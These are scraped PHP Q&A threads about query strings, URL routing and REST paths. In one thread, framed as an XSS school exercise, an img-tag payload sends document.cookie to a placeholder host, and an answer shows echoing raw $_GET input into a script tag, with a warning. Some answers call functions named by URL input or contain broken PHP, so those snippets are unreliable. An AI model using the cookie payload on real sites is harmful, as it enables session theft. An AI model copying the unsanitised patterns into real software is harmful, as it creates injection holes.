Setup:
Script that generates word images from multiple letter images
(autotext.php)
URL is formatted:
www.whatever.com/autotext.php?text=hello%20world
Script that alters images server-side to run filters or generate
smaller sizes (thumbnail.php)
URL is formatted:
www.whatever.com/thumbnail.php?src=whatever.png&h=XXX&w=XXX
Use-case:
I want to generate a smaller version of the autotext server-side. So my call would look something like:
www.whatever.com/thumbnail.php?src=autotext.php?text=hello%20world&h=XXX&w=XXX
As you can see, I would like to treat a URL with _GET variables as a variable itself. No amount of playing with URI encoding has helped make this work.
I have access to the PHP for both scripts, and can make some simple alterations if that's the only solution. Any help or advice would be appreciated. I would not even rule out a Javascript frontend solution, though my preference is to utilize the two scripts I already have implemented.
You should be able to do this by urlencoding all the $_GET params into a variable then assigning that variable to another, like this (untested):
// Url generation
$url = www.whatever.com/thumbnail.php?src=(urlencode(http_build_query($_GET)));
Then you should be able to retrieve on other side:
$src = urldecode(explode('&', $_GET['src']));
I've seen this exact behavior when trapping where to redirect a user, after an action occurs.
---- Update ----
Your "use case" url was correct:
www.whatever.com/thumbnail.php?src=autotext.php?text=hello%20world&h=XXX&w=XXX
.... except that you CANNOT have more than one ? within a "valid" url. So if you convert the 2nd ? to a &, you should then be able to access $_GET['text'] from the autotext.php script, then you can urldecode it to get the contents.
Related
Started learning php this week and had many doubts, but this is one of them which i couldn't find solution(Maybe i didn't know the right keyword to search for).
Is it possible to read variables in URL as a function inside a php file,
for example :
http://mywebsite.com/demo_app/phone_api/login/harsha/harshapass
Here demo_app is the folder, phone_api is the php file, and i want to invoke the function login, where harsha and harshapass is the paramaters to that function.
You'll need 2 things for this.
The first is mod_rewrite, this is an apache module. With this module you can rewrite the URL like you want, so that /demo_app/phone_api/ will redirect to your php file.
I advice that you read a tutorial somewhere about this, for example here.
Second thing is that you need to parse the URL.
With $_SERVER['REQUEST_URI'] you get the URL. With explode and/or preg_match you can parse this string into the parts you want (function, parameters, whatever).
If you have a more specific question about this, you can ask this here (in a new topic).
Good luck!
Did you consider sending the values as $_GET variables and retrieving them in the page like so:
http://mywebsite.com/demo_app/phone_api?login=login&harsha=harsha&harshapass=harshapass
so you can get the values in the phone_api.php page like:
$login = $_GET['login'];
$harsha = $_GET['harsha'];
$harshapass = $_GET['harshapass'];
$login($harsha, $harshapass){
//your function code.
}
Maybe it'll be easier this way.
I'm puttings filters in links with GET variables like this: http://example.com/list?size=3&color=7 and I'd like to remove any given filter parameter from URL whenever a different value for that particular filter is selected so that it doesn't, for example, repeat the color filter like so:
http://example.com/list?size=3&color=7&color=1
How can I if(isset($_GET['color'])) { removeGet('color'); } ?
You can use parse_url and parse_str to extract parameters like in example below:
$href = 'http://example.com/list?size=3&color=7';
$query = parse_url( $href, PHP_URL_QUERY );
parse_str( $query, $params );
// set custom paramerets
$params['color'] = 1;
// build query string
$query = http_build_query( $params );
// build url
echo explode( '?', $href )[0] . '?' . $query;
In this example explode() is used to extract the part of the url before the query string, and http_build_query to generate query string, you can also use PECL http_build_url() function, if you cannot use PECL use alternative like in this question.
You can't remove variables from GET request, just redirect to address without this var.
if (isset($_GET['color'])) {
header ('Location: http://www.example.com/list?size=' . $_GET['size']);
exit;
}
Note: in URL http://example.com/list?size=3&color=7&color=1 is just one $_GET['color'], not two. Only one of them is taken. You can check, is $_GET['key'] exists, but you don't know how many of them you have in your URL
So, assuming I'm understanding your question correctly.
Your situation is as follows:
- You are building URLs which you put into a webpage as a link ( <a href= )
- You are using the GET syntax/markup (URL?key=value&anotherkey=anothervalue) as a way to assign filters of some sort which the user then receives when they click on a given link
What you want is to be able to modify one of the items in your GET parameter list (http://example.com/list?size=3&color=7&color=1) so you have only one filter key but you can modify the filter value. So instead of the above you would start with: (http://example.com/list?size=3&color=7) but after changing the color 'filter' you would instead have http://example.com/list?size=3&color=1).
Additionally you want to do the above in PHP, (as opposed to JavaScript etc...).
There are a lot of ways to implement the change and the most effective way to do it depends on what you are already doing, most likely.
First, if you are dynamically producing the HTML markup which includes the links with the filter text, (which is what it sounds like), then it makes the most sense to create a PHP array to hold your GET parameters, then write a function that would turn those parameters into the GET string.
New filters would appear when a user refreshed the page, (because, if you are dynamically producing the HTML then a server request is required to rebuild the page).
IF, however, you want to update the link URLs on a live page WITHOUT a reload look into doing it with JavaScript, it will make your life easier.
NOTE: It is likely possible to modify the page, assuming the links are hard coded, & the page is hard coded markup, by opening the page as a file in PHP & making the appropriate change. It's my opinion that this would be a headache and not worth the time & effort AND it would still require a page reload (which you could NOT trigger yourself).
Summary
If you are writing dynamic pages with PHP it shouldn't be a big deal, just create a structure (class or array) and a method/function to write that structure out as a GET string. The structure could then be modified according to your desire before generating the page.
If, however, you are dealing with a static page, I recommend JavaScript (either creating js structures to allow a user to dynamically select filters or utilizing AJAX to build new GET parameter lists with PHP and send that back to the javascript).
(NOTE: I am reminded that I have done something along the lines of modifying links on-the-fly for existing pages by intercepting them before they are displayed to the user [using PHP] but my hands were tied in other areas and I would not recommend it if you have a choice AND it should be noted that this still required a reload...)
Try doing something like this in your back-end script:
$originalValues=array();
foreach($_GET as $filter=>$value)
{
if(empty($originalValues[$filter]))
$originalValues[$filter] = $value;
}
This may do what you want, but it feels hackish. You may want to revise your logic.
Good luck!
just put a link/button send the user to index... like this.
<a class="btn btn-primary m-1" href="http:yoururl/index.php" role="button">Limpar</a>
I would like to pass a variable as a value to a website. (Doing a school assignment on XSS)
For example I currently have:
$.cookie('echat') and $.cookie('PHPSESSID')
I would like to pass it into a link say:
xxxx.com/xxx.php?cookie=$.cookie('PHPSESSID')
However, nothing is pass to xxxx.com/xxx.php
Any1 know the syntax to do this?
specifically i am placing a img tag like this to exploit:
< img src='http://xxxxx.com/xxxxx.php?cookie='+document.cookie>
Apparently, document.cookie is not working and I need $.cookie('PHPSESSID') to get the PHPID
Your URL is setting the value of $_GET['cookie'] to $.cookie('PHPSESSID') in your PHP script, nothing more. How that's handled is up to PHP.
Since that looks like JavaScript (specifically, the jQuery Cookie plugin), you could conceivably do echo "<script>{$_GET['cookie']}</script>"; in your PHP to spit it out as JS on the resulting page. As you hopefully know from your classes, blindly using user-submitted data like this is dangerous and a bad idea.
use this php function
url_encode("string")
such as
http://www.xxxxx.com/xxx.php?cookie=<?php echo url_encode("$.cookie('PHPSESSID')"); ?>
I have a project where I need to write text from a database into an HTML5 canvas / Javascript application.
To select this content, I've specified an attribute "reference" where I can ask the database with the content id, for example: index.php?reference=exercise1.
I have used AJAX because I need to get the text content into a Javascript variable in order to write data on canvas.
My solution is working but I need to get the reference attribute value from Javascript document.URL and not PHP $_GET.
Here is the code:
var url = decodeURIComponent(document.URL);
var attr = "reference";
var attrPos = url.lastIndexOf(attr);
var referencePos = attrPos + attr.length + 1;
var reference = url.substr(referencePos,url.length);
What I'm doing seems not to be the clean way to me.
First, ?reference= should be used with PHP $_GET and not be hacked through Javascript.
Then, I have to use lastIndexOf() instead of the search() method in order to get the good value if my application is located in a folder named "reference".
Still, if I have my project in a folder named "reference" with a URI like localhost/reference/projectfolder/index.php and a reference named "projectfolder" in the database, it will load the content even if I have not asked for index.php?reference=projectfolder
From your experience, what is the best solution in my case: be able to get PHP/MySQL data to use with Javascript. Ajax seems to be the best way but as you can see it's not clean, at least my solution.
Thanks for your help.
Still, if I have my project in a folder named "reference" with a URI
like localhost/reference/projectfolder/index.php and a reference named
"projectfolder" in the database, it will load the content even if I
have not asked for index.php?reference=projectfolder
if you want the document to be empty when you are requesting just index.php, check if $_GET["reference"] is set and then return an empty body.
From your experience, what is the best solution in my case: be able to
get PHP/MySQL data to use with Javascript. Ajax seems to be the best
way but as you can see it's not clean, at least my solution.
Check this gist on how to return JSON in your body https://gist.github.com/2627924
I have read many about REST api in php articles. but I still get quite confusing.
they basically rewrite the url to a index.php, which process the url and depends on the method, then send response
but which is the properly way to process the url? this looks doen't look correct...
get the uri and split it
I should know what to do with each portion, eg. for GET /usr/1 I should do something like:
if($myUri[0]=="usr")
getUser($myUri[1]);
if the request url is like GET www.domain.com/user/1
it would call getUser($id);
but what happen if you can also retrieve the user by name, or maybe e-mail? so the url can also be www.domain.com/user/john or www.domain.com/user/john#gmail.com
and each url should call different methods like getUsrByName($name) or getUsrByEmail($mail)
The proper way of handling this would be to have URLs like this:
domain.com/user/id/1 -> user::getById
domain.com/user/email/foo#bar.com -> user::getByEmail
domain.com/user/username/foo -> user::getByUsername
However, specifying multiple "parameters" is more like a search, I'd go against using resources for that, because a path should be absolute. Which means:
domain.com/user/name/Kossel/likes/StackOverflow
And:
domain.com/user/likes/StackOverflow/name/Kossel
Are not the same resource. Instead I'd do:
domain.com/user/?name=Kossel&likes=StackOverflow
This is what Stack Overflow uses:
stackoverflow.com/questions/tagged/php
stackoverflow.com/tags/php/new
stackoverflow.com/questions/tagged/mysql?sort=featured
To avoid long if/else statement, use variable function names. this allows you to use the url string to call the correct function.
http://php.net/manual/en/functions.variable-functions.php
Also, you may want to use classes/class methods instead of functions. this way you can set up an __autoload function, which will allow you to only load code that you are going to use each time the index.php is called.
MVC architecture usually breaks their urls into /class_name/class_method_name/arguments...